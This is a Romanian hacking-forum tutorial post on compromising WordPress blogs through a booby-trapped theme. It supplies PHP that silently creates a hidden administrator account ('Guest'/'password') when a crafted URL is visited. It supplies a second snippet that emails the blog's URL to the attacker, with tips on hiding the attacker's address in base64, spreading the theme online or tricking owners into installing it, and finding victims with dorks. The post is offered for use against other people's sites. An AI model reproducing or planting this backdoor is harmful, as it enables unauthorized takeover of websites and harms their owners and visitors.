Filehost.ro - gazduire fisiere
CSPLAYERS TEAM
CSPLAYERS.3XFORUM.RO COMUNITATE DE GAMING,HACKING,GAMES DOWNLOADS , MOVIES DOWNLOAD , PROGRAMS DOWNLOADS ETC VA ASTEPTAM SA VA INREGISTRATI .
Nou pe simpatie:
Anna281
Femeie
24 ani
Iasi
cauta Barbat
26 - 45 ani
CSPLAYERS TEAMInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
CSPLAYERS TEAM / Tutorials /

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

Pagini: 1  
#1
Admin
Administrator
Postari: 22
Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să īşi de-a seama proprietarul.

Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cāt mai multe blog-uri de pe o anumită nişă web. Se gāndeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit īn minte să creeze şi să "infecteze" o temă (theme) visuală.

Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga īn temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator. Codul este următorul:

Code:

add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}}

Ce face codul de mai sus? Dacă este adăugat spre exemplu īn templates.php (am precizat această filă deoarece este executată automat cānd accesăm index-ul unui blog), oricine va intra pe următorul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea īn baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă.

Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau īl puteţi manipula chiar pe administrator să instaleze tema.

Update
Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea īn care sunteţi informaţi cu ce blog a fost infectat, pe email.

Code:

<?php
add_action('wp_head','wp_wordpressmail');function wp_wordpressmail(){
    if ( is_user_logged_in() ) {
        if(!username_exists('wordpress')){
            $addr=' '; # Aici puneţi adresa voastră de email
            $judul='WP URL';
            wp_mail($addr,$judul,get_bloginfo('wpurl'));
        }
    }
}
?>



Code:

Să vă bucuraţi de metodă. Şi ca să nu vă de-a de gol adresa de mail, puteţi să o encriptaţi īn base64.



 
   
Pagini: 1  
Mergi la